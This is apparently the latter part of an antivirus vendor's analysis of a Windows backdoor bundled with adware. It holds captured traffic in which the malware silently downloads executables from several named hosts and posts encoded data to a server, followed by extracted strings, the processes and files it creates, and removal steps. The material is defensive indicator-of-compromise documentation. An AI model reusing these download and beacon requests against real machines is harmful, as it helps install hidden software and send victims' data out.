data=iIVyuxWUwnlz0PRJLF4JQ&report=VdXF6KKpvgk8eQltvqQkQlHlVcSxLOfSsfrrHa1w7XOmrJq45pJDC0vfFjauGToKOUB9Om87YsoBHA7GrgHtFTDUjBS2S00q9Vgdf4J/9sqQu3FwVNLfEDtUdsoli3ufqWlCXJIZKgGDC/8wXVRyfDDS408Y tl3Hujp2Gyncogq3ROEfvqdaA1eHfy4F6wv0NDwd1ThdAdgoAihodN zJ7EZAV6U128aFZmQYkegWIOfSJQ1BSV6uzaOP4Ifm/N00BB064qbDTCSru9FvdqC9MGY8ylwSpEEMAhK6xHGAObGPI8IzaLYQX9wqwbchSh0UmY0vLE033oHbwl9bzsFq70Fl8uMp0rtVu3NpctmnFvgMAhx3PWQeBRi1rGFqnBJgZ8eQOcIhGfmxhOIzjExeC2ndmugBioOZ65pDYw03J92lh4Y78Y1fUwiXRjTwBLbxVJnRZY2JgtJrUQNYeAXmJHvFNKRRPJJz8GFoj4v6BQeiQNfD3DPbhFx/IV3x9eX5In12ZVRqRH1YWL6/3hgJU4tIdz7ZksNMVlLxOdHnkeZq5DQnlBnIQ8tAht1mlhcRKMU8bK2z2el3s82LnUHY8ACFZK9Rp/EPDsvlBmKjLKgm5TDhzXY9gtHgvyAtz2CD etNYI6jw9GG9NEGhGOlS9SI82s4bTG4Z6kYVOp4ApTJy/4KH33lDTJsPHlsDtsJTCOS rawUOUkGp/wRbZ1BhU G1npbjxKduXSSwy4hZN8gCtiaRThNzAwHDUshCf83y3Nr8LoDzmUdV6pyidygSWilVwHqmKhJX0JI9V5eOy19lelJw8/fs7kST62nmQ0op7s31RavoH5jO194MHcrOTfYJfUoXARwZHilV9uxbWcRWT6ocZf19h4zkWPMjMWR1FXxJZM7AzZ2 FJYgp6zeAimAw5aJ3 nOdMI1hWp4V2gSsZhAYXdgm3eXVH/g1ECDFc6yPw55QJwRR3tZFluaXs8z9a5tvmg  qxHx3SeibFtYP/MG1ZormIPh5eiGjlTDBEivUMPM uE0TM93J5vENnyXU2Ec4D P33eTS9FOn9xO0b6euAwx5ljDFVQ5tnQAZHAneOE71Mo eay12oI1ScZkybwZHP6SUYz kcBU1jLQWKf3h2OAZlXuw0YapPV6NrsCoYME3iVT2bCa3ORPXskSDXfMZJopmuJ/JF7FSgC3oRoyKw4Z9QuqE6BQyi21lS/rjMC2yxMn6W cKuQkjl0LGDQicF0Tu5Hg2TR37y9dmr5gfXGNPZ
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:50 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}


GET /?step_id=4&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.storesis.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:32 GMT
Content-Type: text/html
Content-Length: 9710
Connection: close
Content-Disposition: attachment; filename="4.txt"

<<< skipped >>>

GET /hp/?q=XDOtvcE+9jE/sqMztvXFjnV0Q9S5QAWSoMFJVLK2BupEE8V7TCpqJoGq/iUeUKvbvmDwEpIGujfPRivaynoO9il//gnTI+akMQhfaElhTWusj5ht3kdqYS0gcmr8lJRjyYajy0WmpJYzt8V1hGGJd6bu1v1Wjq6fQOF0vAXOLe0aIPkSZPKdnETmEH0PtwjHTGUMXNiBdiO7KPOOSY8c/Dvf5mTLc05Yr1a5uwXIQgSoV30s915myZ8+GZD2/5iQxW6ZCDtTnWb5vPL/R0cB3VtBtXt++aiHLFtYt9rxpIMJS30soMfKTAbZNbyO4WGAc4gMuLVlHX4yIkVjv+6VAlvUM HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Host: linq-goody-best.xyz


HTTP/1.1 200 OK
Server: openresty
Date: Sat, 09 May 2015 23:05:58 GMT
Content-Type: application/octet-stream
Content-Length: 547095
Connection: close
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Content-Description: File Transfer
Access-Control-Expose-Headers: Content-Length
Content-Disposition: attachment; filename*=utf-8''download.exe; filename="download.exe"

<<< skipped >>>

POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.mytholiday.com
Content-Length: 4532
Cache-Control: no-cache

data=39ZH7x2d1y6Icv1defocsdCTnOTqMgTdh3aIlyGSKJupDB4MrUsKm9xC 4w3Nc7bRRe9qw3P1xG0ANsWnJCVI2r Z5mH5aBn8FttrxxFGN1 IHbZ/HJZ/5lWvWtjmwqqkP6Bb NPW5ZpO GGZw6CBzegOG5 Ds4X6XSMPUjpfUQ8YKnWxecsSPOyABHcJMPJ8UslQJf4MqVqJQkYapEqeOyASZaWejNcwWt75MWIp3BQRO2SbwG/j8 MlZeCZAhU2ekXxV7bOA5gzat/ jtIz1NuNs2bZG/mD8umcTxGiF4Xjh96NkJwl7kb0ImZ1eST4oLRQkxS3Eg/SBzcgKQg2ik4ySJRJMBgpJeaznLYPhQBbsPZeWqUbtYpAAwr1wEG/32Xx8UqAzs51Cy6yeuQDKysZoxcU7Jjj1sF7Lx7CVwEoXkb6uvjUHdUKkYOdpCuqwkQdTIukh6/hmlCmvPaGjROOoUG4wSwdN wFzRYPZK27pnbCVvOr92Pho2lNpU1 cgCJACBH9QUtU2cyUel M6fT6v76dUCO9zcKd7lcDJ31PfjCOIsWx3pluarLfgtu9FxzdLFqgoLK1bS0iHQdVfE1t7SPDmyeqeH9QTWlzrI7Ba6SDeFAYy4gy8Vd7PouBbsmamo02OosmPriOCbX5FTf lzbLeZjMQizliuysVKLYLJ5yuNqI6jR9BfZ2IA6oLmgqRfigYGqGYXGWnsZV8hROtIuqVAFTRiCLnkYGm3hRCBUME7zDfF66SKSOMbVfy48JXUsyClUGlWjdiP5VE8x4A/TBo3awyQvB kXhArJRqG Y0tSmjhskMi002QiFM4R21vdR24GYhttiSnDNb8s6iFePiR0NiuWFkDo67otxZf8hRX6oflpniVzlR B8dyKCZO18N3GfCMWoUu12PDBxPE5mgsu&report=QH8R3fNPd1n9AgdnikFSDxwHv6AB55R ilZSoU8gPOuyCI8PPAlwYAw5idmolx/avfKXiqKIqpjTRZ 0nXC3M4A9DMXyluhnxUMbsE AjOPZF/M3Ac2yxUOibgYmjc3K/E67aHyjeutBzsVNLOSDWrU1YO6ljydc7GUJDj8A3zl0a /OaNgyncMe3FDp/fZ088wqQnolFlFKaKX2PQQgJhwSZtZ ZVCr5b5TKMrRzK3LmddoQKljfzDwFUUL95Ic Yzb1wTyHtXSe8eZx2Dd2j3GOFbup28vZ/3VAMv8uFyRaHU3/3TEw0J8HqQX0xvUX0beVUlSiu6QwP2wuGZlTfqvFjsyI0lx/GYbrztT3arOvC5
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:03 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}


GET /?e=whcop&sfx=2&cht=0&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: goldavid.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:04 GMT
Content-Type: application/octet-stream
Content-Length: 2012618
Connection: close
Content-Disposition: attachment; filename="9Bgp6JPux0JTfR.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *

<<< skipped >>>

GET /?e=wxd&dd=20&ams=6&emnum=38&publisher=&ind=5459321632979031863&exid=0&ssd=7757455632247121954&hid=12802899647634509424&osid=501&fc=1&jc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: loveshero.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:18 GMT
Content-Type: application/octet-stream
Content-Length: 1139531
Connection: close
Content-Disposition: attachment; filename="2UzDN7fW9Yl4sH.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *

<<< skipped >>>

GET /?step_id=6&sf=1&installer_id=5459321632979031863&publisher_id=24406&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2310208155889048869&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=12802899647634509424&session_id=7757455632247121954&project_encode_id=24406&task_extension=1&payload_ver=dev&sr=0&enc_u_p=1&enc_u_p=1&st=0&IX_Startapp=1&pic_installer_ver=14&InstallerLink=0&SilentInstall=1&HideTaskbarIcon=1&AddToPayLoad=RunOnceMutex="alpha_installer"/n InstallerLink="0"&publisher_id=24406&download_id=2310208155889048869&installer_id=5459321632979031863&session_id=0&iid=5459321632979031863&did=2310208155889048869&installer_only=1&st=0&IX_Startapp=1&self_redirect=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.storesis.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:52 GMT
Content-Type: text/html
Content-Length: 8562
Connection: close
Content-Disposition: attachment; filename="6.txt"

<<< skipped >>>

GET /?e=nnnbvv&publisher=&&dd=3&ind=5459321632979031863&exid=%UpdateInfo_ExternalID&bijo=1&ssd=7757455632247121954&hid=12802899647634509424&osid=501&sfx=2&jc=1&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: storestral.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sat, 09 May 2015 23:06:34 GMT
Content-Type: application/octet-stream
Content-Length: 1962996
Connection: close
Content-Disposition: attachment; filename="xoL9D9NSNKXd4Z.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *

<<< skipped >>>

The Backdoor connects to the servers at the following location(s):

rundll32.exe_1432:

.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    regsvr32.exe:1932
    regsvr32.exe:1980
    ArmorerRise.xyz.exe:2036
    %original file name%.exe:1176
    %original file name%.exe:1988
    %original file name%.exe:368
    %original file name%.exe:1888
    %original file name%.exe:188
    %original file name%.exe:1016
    rundll32.exe:1432
    rundll32.exe:1196

  2. Delete the original Backdoor file.
  3. Delete or disinfect the following files created/modified by the Backdoor:

    %Documents and Settings%\%current user%\Local Settings\Temp\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}-log.txt (57034 bytes)
    %Program Files%\TailCutter\TailCutter.dll (80814 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (7972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca.part (71639 bytes)
    %Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb (13 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\a6316e1ae4dae3cab1ad0965983a8e70.ini (517 bytes)
    %Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe (1504 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\loader.gif (2 bytes)
    %Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\9Bgp6JPux0JTfR[1].ca (129298 bytes)
    %Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll (6700 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\2UzDN7fW9Yl4sH[1].ca (65187 bytes)
    %Program Files%\ActiveCoupon\ActiveCoupon.exe (2486 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca.part (38114 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\2e3398c745d7293bb1ad0965983a8e70.ini (294 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\478\images\progressbar.gif (15 bytes)
    %Program Files%\ActiveCoupon\ActiveCoupon.dat (312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\478\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\bg.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\874a6a15d18c264327f5c81ec98e2cf9.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\5[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\3.ini.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(5).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\2.ini.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\6.ini.tmp (592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\%original file name%.exe (16544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(3).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task.ini (6 bytes)
    %Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\874a6a15d18c264327f5c81ec98e2cf9.dat (866 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(2).ini (6 bytes)
    %Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\%original file name%.exe (16544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\ArmorerRise.xyz.exe (16584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\3[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\5.ini.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\4.ini.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(4).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (2 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\d2bec04cb91e9cb6b1ad0965983a8e70.ini (150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca.part (31648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Oo8yOHF14wFvBA[1].ca (29424 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\loader.gif (2 bytes)
    %Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\progressbar.gif (15 bytes)
    %Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll (6665 bytes)
    %Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe (1504 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca.part (43652 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\73515851bcb7cafbb1ad0965983a8e70.ini (522 bytes)
    %Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xoL9D9NSNKXd4Z[1].ca (123415 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1980\images\loader.gif (2 bytes)
    %Program Files%\Chime\Chime.exe (1504 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\3e3e983e008005d3b1ad0965983a8e70.ini (285 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca.part (16744 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[2] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\XwPLangqfnEVNV[1].ca (16664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1980\images\progressbar.gif (15 bytes)
    %Program Files%\Chime\Chime.dat (5 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
